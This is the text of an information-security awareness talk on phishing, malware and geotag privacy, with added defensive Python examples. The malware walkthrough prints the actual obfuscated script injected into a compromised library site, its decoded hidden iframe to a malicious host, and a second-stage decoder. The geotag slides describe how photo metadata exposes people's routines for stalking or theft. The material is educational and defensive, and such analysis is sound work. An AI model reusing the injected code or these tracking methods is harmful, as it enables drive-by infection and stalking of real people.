Malware, Big Hacks, and Stalking: Information Security at a Glance Ben Jackson, Mayhemic Labs
Objectives • Become familiar with InfoSec • Understand security threats • Learn defensive measures • Ultimately, shed some light on the activities behind the curtain
InfoSec Defined “protecting information and information systems from unauthorized access, use, disclosure, disruption, modification or destruction” - Wikipedia
InfoSec defined • Confidentiality • You don’t want your data getting out • Integrity • You don’t want your data altered • Availability • You want to access your data
Seems simple, what’s the big deal? • IT presence both inside and outside of “traditional roles” is constantly expanding • People want information anytime and anywhere, via an increasing number of different devices • Increased reliance on technology also increases exposure to attacks
Threats • Phishing • Attempting to steal sensitive information by masquerading as a trustworthy entity in an electronic communication • Primarily via spoofed e-mail and web sites • Increasingly, IM is the tool of choice • Pharming • Re-directing users to fraudulent web sites • DNS cache poisoning • Modified HOSTS file • Typo-Squatting
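A check for the modified-HOSTS-file variant of pharming, added here as an example (it is not code from the talk). It parses a hosts file and reports every hostname mapped to something other than the loopback or unspecified address; the sample file, including its bank and intranet names and the 203.0.113.7 address, is constructed for the demonstration:

```python
# Added example (not from the talk): flag HOSTS-file entries that send a public
# hostname somewhere other than loopback, i.e. the "modified HOSTS file" pharming case.
# The sample file below is constructed; real paths are /etc/hosts and
# %SystemRoot%\System32\drivers\etc\hosts.
import ipaddress
import sys

SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.   (constructed sample, not a real file)
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net                       # ad-blocker style entry: harmless
203.0.113.7     www.bank.example online.bank.example  # pharming: routable attacker host

192.168.1.20    intranet.corp.example                 # LAN override: worth a look, may be legitimate
"""

# Names that legitimately point at loopback or link-local multicast on most systems.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}


def parse_hosts(text):
    """Yield (ip_address, hostname) for every mapping, ignoring comments, blank
    lines and lines whose first field is not an IP address."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                                  # garbage line, not a mapping
        for name in fields[1:]:                       # one address may carry several names
            yield ip, name.lower()


def suspicious_entries(text):
    """Return [(hostname, ip)] for names mapped to anything other than loopback or
    the unspecified address (0.0.0.0 / :: are the ad-blocking idiom).
    Anything else, public or private, overrides DNS for that name and deserves a look."""
    hits = []
    for ip, name in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified or name in LOCAL_NAMES:
            continue
        hits.append((name, str(ip)))
    return hits


if __name__ == "__main__":
    # Usage: python hosts_check.py [path-to-hosts]; with no argument the constructed sample is used.
    if len(sys.argv) > 1:
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        text = SAMPLE_HOSTS
    for name, ip in suspicious_entries(text):
        print(f"{name} -> {ip}")
```

Loopback and 0.0.0.0 targets are skipped because that is how ad-blocking hosts lists work; a private-address override for a public name is reported too, since a developer's deliberate override and an attacker's redirect look identical in the file. DNS cache poisoning leaves no trace here, so a clean hosts file rules out only one of the two pharming routes.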
Threats • Viruses • “a piece of code that adds itself to other programs” (Spafford, 1988) • Cannot run independently - requires that its “host” program be run to activate it.
More Threats • Worms • “a program that can run by itself and can propagate a fully working version of itself to other machines.” (Spafford, 1988) • Consumes resources because it replicates itself continually, taking up storage and memory • Not necessarily malicious
Even More Threats • Info Stealers • Surveillance software/spyware that records every keystroke into a hidden/encrypted log file • Log file is periodically transmitted to the attacker • Used to steal financial account numbers (Banks, eBay, PayPal, credit cards, etc.)
Guess what? More Threats • Spyware • Software used to track Internet activities, redirect browser to certain web sites • Sometimes also employs an Info Stealer
Malware? • Short for “Malicious Software” • Catch-all term • Preferred over the other catch-all, “computer virus” • Every computer virus is malware, but not all malware is a computer virus.
Why would anyone want to attack me? • How many sensitive things do you do on your computer? • Personal • Banking • Online Auctions • Bill Payment • Work • Login Credentials • Employee Information • Other “Personally Identifiable Information”
I don’t have any of that… • Even if you don’t have sensitive information, you can still be used to attack others • What if I want to attack one of your friends who works at a target of mine? • Compromise your e-mail? • Pose as you on Facebook? • Attack him or her via Instant Messenger?
Have I been compromised? • “I’m not compromised!” • How are you sure? • Possible warning signs: • Computer suddenly noticeably slower? • Mysterious failures in commonly used applications? • Unexpected pop-up windows? • Mysterious/unexpected behavior? • None of these proves you are clean, either: a keylogger that only watches browser forms shows no symptoms at all
How did I get compromised? • Sadly, it’s easy • All too common • Let’s walk through an example • New York Public Library • Website was compromised late 2008 • Used to distribute malware
Wait a minute… http://ga6.org/enypl/home.html
Obfuscation! • Hidden in that web page is:
<script type="text/javascript"> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script>
• What’s that?
Obfuscation deobfuscated! • What’s really there:
<iframe src="http[:]//fotballportal.info/out.php?s_id=1" style="visibility: hidden;display: none"></iframe>
• Hosted in Malaysia • This redirects the user to: “http[:]//meraxe.com/fsp1/index.php” • Also hosted in Malaysia • This all happens silently and invisibly! • What’s at meraxe.com…?
Game over • At meraxe.com, we find:
<script>function v4726d05808fd9(v4726d058097a8){ function v4726d05809f78 () {var v4726d0580a748=16; return v4726d0580a748;} return(parseInt(v4726d058097a8,v4726d05809f78()));}function v4726d0580af18(v4726d0580b6e8){ function v4726d0580ce59 () {var v4726d0580d630=2; return v4726d0580d630;} var v4726d0580beb8='';for(v4726d0580c68d=0; v4726d0580c68d<v4726d0580b6e8.length; v4726d0580c68d+=v4726d0580ce59()){ v4726d0580beb8+=(String.fromCharCode(v4726d05808fd9(v4726d0580b6e8.substr(v4726d0580c68d, v4726d0580ce59()))));}return v4726d0580beb8;} document.write(v4726d0580af18('Truncated));</script>
• The random-looking names are a thin wrapper around a hex decoder: v4726d05808fd9 is parseInt(x, 16), and v4726d0580af18 walks its argument two characters at a time, turning each hex pair into a character with String.fromCharCode and handing the result to document.write • Effects: • Something is silently downloaded and executed by your computer
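An added example of peeling the two encodings shown on the last three slides, written for this page rather than taken from the talk. The percent-encoded literal is the one from the compromised NYPL page; the second stage is a constructed stand-in for the truncated meraxe.com script that reproduces its parseInt(pair, 16)/fromCharCode loop and points at the placeholder host example.invalid:

```python
# Added example (not code from the talk): peel the two encoding layers used in the
# NYPL drive-by. The percent-encoded string is the one from the compromised page; the
# hex-pair stage is a constructed stand-in for the (truncated) meraxe.com script, built
# from the same parseInt(pair, 16) / fromCharCode loop.
import re

# Layer 1, verbatim from the injected document.write(unescape('...')) on the NYPL page.
NYPL_STAGE1 = (
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C"
    "%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22"
    "%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B"
    "%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E"
)


def js_unescape(s):
    """Emulate JavaScript unescape(): %uXXXX first, then %XX, with no UTF-8 decoding
    (urllib.parse.unquote would mangle %u sequences and non-ASCII bytes)."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def hex_pairs_decode(s):
    """Mirror of the meraxe.com decoder: String.fromCharCode(parseInt(s.substr(i, 2), 16))."""
    return "".join(chr(int(s[i:i + 2], 16)) for i in range(0, len(s), 2))


IFRAME_RE = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*[\"']([^\"']+)[\"'][^>]*>", re.I)
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*[\"']?[01]\b", re.I)


def find_hidden_iframes(html):
    """Return [(src, hidden)] for every iframe; hidden means CSS-hidden or 0/1 pixel."""
    return [(m.group(1), bool(HIDDEN_RE.search(m.group(0)))) for m in IFRAME_RE.finditer(html)]


STRING_LIT = re.compile(r"'([^'\\]*)'")


def peel(script, max_depth=5):
    """Decode every single-quoted literal that looks percent- or hex-encoded, then
    repeat on the result. Returns the decoded layers, innermost last.
    Heuristic: an even-length literal of 8+ hex digits is treated as hex pairs."""
    layers, current = [], script
    for _ in range(max_depth):
        decoded = []
        for lit in STRING_LIT.findall(current):
            if "%" in lit:
                decoded.append(js_unescape(lit))
            elif len(lit) >= 8 and len(lit) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", lit):
                decoded.append(hex_pairs_decode(lit))
        if not decoded:
            break
        current = "\n".join(decoded)
        layers.append(current)
    return layers


# Constructed stand-in for the second stage: a hex-pair literal that unpacks to another
# unescape() layer, which in turn unpacks to a 1x1 iframe. The host is a placeholder.
INNER_HTML = '<iframe src="http://example.invalid/fsp1/index.php" width="1" height="1"></iframe>'
INNER_SCRIPT = "document.write(unescape('" + "".join(f"%{ord(c):02X}" for c in INNER_HTML) + "'))"
SAMPLE_STAGE2 = (
    "<script>function d(s){var o='';for(i=0;i<s.length;i+=2)"
    "o+=String.fromCharCode(parseInt(s.substr(i,2),16));return o}"
    "document.write(d('" + INNER_SCRIPT.encode("ascii").hex() + "'))</script>"
)

if __name__ == "__main__":
    print(js_unescape(NYPL_STAGE1))
    for depth, layer in enumerate(peel(SAMPLE_STAGE2), 1):
        print(f"layer {depth}: {layer}")
    print(find_hidden_iframes(peel(SAMPLE_STAGE2)[-1]))
```

Real droppers usually feed the decoded text to eval rather than document.write, nest more than two layers and mix in %u sequences that urllib's unquote does not handle, which is why the loop peels repeatedly and js_unescape is hand-rolled. Treat decoded URLs as hostile: resolve and fetch them from an isolated box, never from the machine you are investigating on.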
What happened?!?! • Downloaded and executed a file (age.exe) • Added file c:\WINDOWS\system32\control.dll • Added several Registry entries • Control.dll is loaded as a Browser Helper Object (BHO) when IE is started and acts as a keylogger • Deleted itself
Pwnz0r3d! • Control.dll monitors data entered into forms in IE • Steals user’s login credentials for legitimate web sites • On-line banking, credit cards, eBay, Paypal, etc, etc • “Phones home” with stolen data
What have we learned? • The Lesson? • Constant vigilance is vital • A single “careless click” is all it takes, and sometimes not even that: simply viewing a web page can result in infection • Bottom Line: • The web is a scary place.
Why don’t they call it “Computer Security?” • Computers are a common attack vector, but information is what everyone is after • How much Information do you generate on a daily basis? • More importantly, how can this be used against you?
Locational Privacy • “Locational privacy (also known as "location privacy") is the ability of an individual to move in public space with the expectation that under normal circumstances their location will not be systematically and secretly recorded for later use.” • Electronic Frontier Foundation, http://www.eff.org/wp/locational-privacy
Threats to your Locational Privacy (From the EFF) • Monthly transit swipe-cards • Electronic tolling devices • Traffic Cameras • Mobile Telephones • Electronic swipe cards for doors • Services telling you when your friends are nearby • However… They did miss one…
GeoTags • Small bits of EXIF (Exchangeable Image File Format) data that encode the latitude, longitude and altitude of where the photo was taken, and sometimes the direction the camera was pointing • A lot of phones have this turned on by default • Why? Someone thought it was a good idea, I guess • Already a bad idea if you’re taking photos for later publication, but what happens when you’re instantly publishing them?
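An added example, not from the talk, of what a geotag actually is on the wire and how to read or remove it. The TIFF structure (IFD0, the GPSInfo pointer 0x8825, the GPS IFD with its degree/minute/second RATIONALs) is the real Exif layout; the coordinates, the build_sample() packer and the one-segment JPEG wrapper are constructed for the demonstration:

```python
# Added example (not from the talk): read, and scrub, the GPS IFD of an Exif block
# using only the standard library. The TIFF/Exif layout is the real one; the
# sample coordinates and the JPEG wrapper at the bottom are constructed.
import struct

TAG_GPS_IFD = 0x8825                 # IFD0 entry that points at the GPS IFD
LAT_REF, LAT, LON_REF, LON = 1, 2, 3, 4
ASCII, LONG, RATIONAL = 2, 4, 5      # TIFF field types used here

def exif_from_jpeg(jpeg):
    """Return the TIFF block inside the APP1 'Exif\\0\\0' segment, or None."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):   # EOI / start of scan: no more header segments
            break
        length = struct.unpack_from(">H", jpeg, pos + 2)[0]
        payload = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and payload[:6] == b"Exif\x00\x00":
            return payload[6:]
        pos += 2 + length
    return None

def _entries(exif, off, order):
    """Yield (tag, type, count, raw 4-byte value-or-offset) for the IFD at off."""
    for i in range(struct.unpack_from(order + "H", exif, off)[0]):
        base = off + 2 + 12 * i
        tag, typ, cnt = struct.unpack_from(order + "HHI", exif, base)
        yield tag, typ, cnt, bytes(exif[base + 8:base + 12])

def _gps_ifd(exif):
    """Byte order ('<' or '>') and offset of the GPS IFD, or None if absent."""
    order = {b"II": "<", b"MM": ">"}[bytes(exif[:2])]
    magic, ifd0 = struct.unpack_from(order + "HI", exif, 2)
    if magic != 42:
        raise ValueError("bad TIFF magic")
    for tag, typ, _, raw in _entries(exif, ifd0, order):
        if tag == TAG_GPS_IFD and typ == LONG:
            return order, struct.unpack(order + "I", raw)[0]
    return order, None

def _dms(exif, off, cnt, order, ref):
    """deg/min/sec RATIONALs at off -> signed decimal degrees (S and W negative)."""
    vals = [n / d if d else 0.0
            for n, d in (struct.unpack_from(order + "II", exif, off + 8 * i) for i in range(cnt))]
    vals += [0.0] * (3 - len(vals))
    dec = vals[0] + vals[1] / 60 + vals[2] / 3600
    return -dec if ref in ("S", "W") else dec

def read_gps(exif):
    """(lat, lon) in decimal degrees, or None when the block carries no coordinates."""
    order, gps = _gps_ifd(exif)
    if gps is None:
        return None
    f = {}
    for tag, typ, cnt, raw in _entries(exif, gps, order):
        if typ == ASCII:
            f[tag] = raw.split(b"\x00")[0].decode("ascii", "replace")
        elif typ == RATIONAL:                     # 8-byte values never fit inline
            f[tag] = (struct.unpack(order + "I", raw)[0], cnt)
    if not all(t in f for t in (LAT_REF, LAT, LON_REF, LON)):
        return None
    return _dms(exif, *f[LAT], order, f[LAT_REF]), _dms(exif, *f[LON], order, f[LON_REF])

def strip_gps(exif):
    """Copy with the GPS IFD emptied and its entries and off-IFD data zeroed;
    only zeroing the count would leave the coordinates recoverable by carving."""
    buf, (order, gps) = bytearray(exif), _gps_ifd(exif)
    if gps is None:
        return bytes(buf)
    entries = list(_entries(exif, gps, order))
    for _, typ, cnt, raw in entries:
        if typ == RATIONAL:
            off = struct.unpack(order + "I", raw)[0]
            buf[off:off + 8 * cnt] = bytes(8 * cnt)
    buf[gps:gps + 2 + 12 * len(entries)] = bytes(2 + 12 * len(entries))
    return bytes(buf)

def build_sample(lat_dms, lat_ref, lon_dms, lon_ref):
    """Constructed little-endian Exif block: IFD0 -> GPSInfo -> GPS IFD (4 entries)."""
    gps, lat_off = 8 + 18, 8 + 18 + 54            # IFD0 is 18 bytes, GPS IFD 54
    out = bytearray(b"II*\x00" + struct.pack("<IHHHIII", 8, 1, TAG_GPS_IFD, LONG, 1, gps, 0))
    out += struct.pack("<HHHI4sHHIIHHI4sHHIII", 4,
                       LAT_REF, ASCII, 2, lat_ref.encode() + b"\0\0\0", LAT, RATIONAL, 3, lat_off,
                       LON_REF, ASCII, 2, lon_ref.encode() + b"\0\0\0", LON, RATIONAL, 3, lat_off + 24, 0)
    for num, den in list(lat_dms) + list(lon_dms):
        out += struct.pack("<II", num, den)
    return bytes(out)

# Constructed sample: 40 deg 45' 11.5" N, 73 deg 58' 56" W, wrapped in a bare-bones JPEG.
SAMPLE_EXIF = build_sample([(40, 1), (45, 1), (115, 10)], "N", [(73, 1), (58, 1), (56, 1)], "W")
SAMPLE_JPEG = (b"\xff\xd8\xff\xe1" + struct.pack(">H", len(SAMPLE_EXIF) + 8)
               + b"Exif\x00\x00" + SAMPLE_EXIF + b"\xff\xd9")
```

With a real photo, exif_from_jpeg(open(path, 'rb').read()) yields the block; read_gps() turns the three rationals into signed decimal degrees, and strip_gps() zeroes the entries and the off-IFD data rather than just the count, because the bytes otherwise stay in the file for anyone who carves it. Writing the scrubbed block back means splicing it into the APP1 segment, which this example leaves out.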
Not an isolated incident • After research, we discovered that about 3% of photos posted to Twitter have Geo-Tags on them • Doesn’t sound like a lot, but how many photos are posted to Twitter each day?
What’s the big deal? • I want to steal something from your co-op’s network… • Thanks to your sharing habits I know • Where you live… • That you’re telecommuting today… • That you “check into” a Starbucks every day around 10AM… • Boy, let’s hope you logged out of your VPN before you left!
Or how about… • What if I want something stored on your laptop? • Thanks to your sharing habits I know • That you “check into” a Panera Saturday afternoons • That your code repository for your personal project gets updated before your “check in” at your home • What happens if I sit at that Panera and poison their WiFi connection? • Or if I just take your laptop when you go for a refill?
Some other scenarios • Why do you and your attractive classmate both go to dinner the same fancy restaurant every Tuesday after work? • Doesn’t your significant other have Yoga that night? • Why are you in a coffee shop nowhere near your apartment every Friday night? • Isn’t that close to a local AA meeting?
But Wait! There’s More! • Stalking • OK, someone might not be stalking you, but what about your friends? • Can I establish a pattern of their behavior from information you post? • Surveillance • People love routines, why did you break yours?
Some Stats… • Trawler averages around 15GB of downloads per day • 35,000 tweets scanned • 20,000 pictures reaped • Probably around 4 million photos since we started the project • Honestly, we stopped counting • 120,000 geotagged photos found
Join InfoSec: Fame and Fortune can be yours! • Apparently when you say you’re stalking everyone on Twitter, people notice. • NY Times, BBC, ABC News, Today Show, Toronto Star, CNET to name a few… • You also get your ISP banned from using TwitPic • Whoops!
Protecting Yourself • Patch, Patch, Patch! • Use auto-update whenever possible • Patch Everything • Adobe is a favorite target of attackers right now. Flash and Acrobat especially. • Use both Anti-Virus and Anti-Malware Software • Update every day
Protecting Yourself (cont.) • Practice “Safe Internet” • Don’t click links you don’t know • Don’t open unexpected e-Mail attachments • Don’t Download from Questionable Sites (esp. Freeware) • Don’t use Peer-to-Peer software
Protecting Yourself (cont.) • Beware Wireless Routers/Access Points: • At home… • Change the default password and default SSID • Enable “WPA2” encryption with a strong passphrase • Enable and use MAC filtering (a speed bump at most: permitted addresses are visible on the air and trivial to spoof) • And on the road… • Who’s watching your traffic at Starbucks?
Protecting Yourself (cont.) • Don’t save user IDs and passwords on your hard drive • Use a separate computer for “sensitive” transactions • Banking • Paying bills • Credit Cards • …and nothing else